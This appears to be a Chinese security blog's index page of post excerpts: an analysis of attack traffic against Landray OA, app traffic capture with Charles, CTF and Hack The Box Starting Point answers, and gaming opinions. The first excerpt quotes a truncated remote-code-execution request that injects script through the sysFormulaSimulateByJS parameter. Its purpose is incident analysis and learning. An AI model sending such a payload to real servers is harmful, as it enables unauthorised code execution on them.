恶意代码分析---蓝凌OA
# 蓝凌 OA— 恶意代码分析 # 一、大致经过 进行护网前期资产排查的时候,在客户这边的登录系统上面发现蓝凌 OA 的一个漏洞,同时分析攻击数据包发现恶意代码 /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){return java.lang.Runtime};r=test
APP抓包
# APP 抓包 # 一、Charles 抓包步骤 环境:Charles 4.6.3 逍遥模拟器 步骤: Charles 中下载证书: Help–>SSL Proxying—>Save Charles Root Certificate… 将证书保存到本地,然后将证书放入到与模拟器共享的文件夹下 (路径无所谓,只要是与模拟器共享的文件夹就行) 在模拟器的找到设置 -> 安
攻防世界---Training-WWW-Robots
# Training-WWW-Robots 题目说明:访问链接后,将其翻译过来如图所示,说明这个是有关爬虫 robots.txt 文件的内容。 所以,我的思路是先尝试访问 robots.txt 看看能不能找到什么信息,在网址后面拼上 robots.txt 得到如图内容: 根据文件信息可以看到禁止了所有 robots 引擎访问 f10g.php 这个文件,但是允许 Yandex 搜索引擎访问除过
对于XSS主机的一些看法
之前一直看网上说 XSS 这机子怎么怎么🐮,说实话在目下这个主机版本里面 XSS 的性能真不怎么样,就同家的 XSX 的性能都比 XSS 强,所以 XSS 就不能单拉性能而论。个人认为 XSS 存在的意义就是为了降低游玩 3A 游戏的入门门槛,让那些喜欢打游戏但是资金又不充足的人群也能够的到。所以对于御三家都有的玩家来说 XSS 在这部分人眼中确实是电子垃圾,但是对于穷游党来说 XSS+XGP
关于游戏的理解
最近入手了一台 XSS,人生的第一台主机,不得不说是真滴香🐮🐮🐮🐮🐮🐮。记得小学二三年级那会儿,真的很羡慕小伙伴手上的 PS 游戏机,当时玩的还是宝可梦和罪恶都市还有一个三国的什么游戏,所以那时候有事没事都去小伙伴那蹭游戏。后来应该是上六年级吧家里装了电脑,当时第一件事就是下穿越火线,那时候这游戏可不像现在这么😫这游戏在我那个时候真的受众程度不亚于 LOL,也就是从这个时候开始慢慢接
HackBox---Three
# Three # 一、问题 123456789101112131415161718How many TCP ports are open? 2What is the domain of the email address provided in the "Contact" section of the website? thetoppers.htbIn the absence of a DNS
HackBox---ArcheType
# ArcheType # 一、问题 Which TCP port is hosting a database server?(哪个 TCP 端口托管数据库服务器?) 1433 What is the name of the non-Administrative share available over SMB?(SMB 上可用的非管理共享的名称是什么?) backups What
HackBox---起点(二)
# HackBox— 起点 (二) What does the 3-letter acronym FTP stand for?(3 个字母的首字母缩略词 FTP 代表什么?) File Transfer Protocol (文件传输协议) Which port does the FTP service listen on usually?(FTP 服务通常监听哪个端口?) 21
HackBox---起点(三)
# HackBox— 起点 (三) What does the 3-letter acronym SMB stand for?(3 个字母的首字母缩略词 SMB 代表什么?) Server Message Block What port does SMB use to operate at?(SMB 使用哪个端口进行操作?) 445 What is the service name
HackBox---起点(四)
# HackBox— 起点 (四) Which TCP port is open on the machine?(机器上打开了哪个 TCP 端口?) 6379 Which service is running on the port that is open on the machine?(哪个服务在机器上打开的端口上运行?) redis What type of database
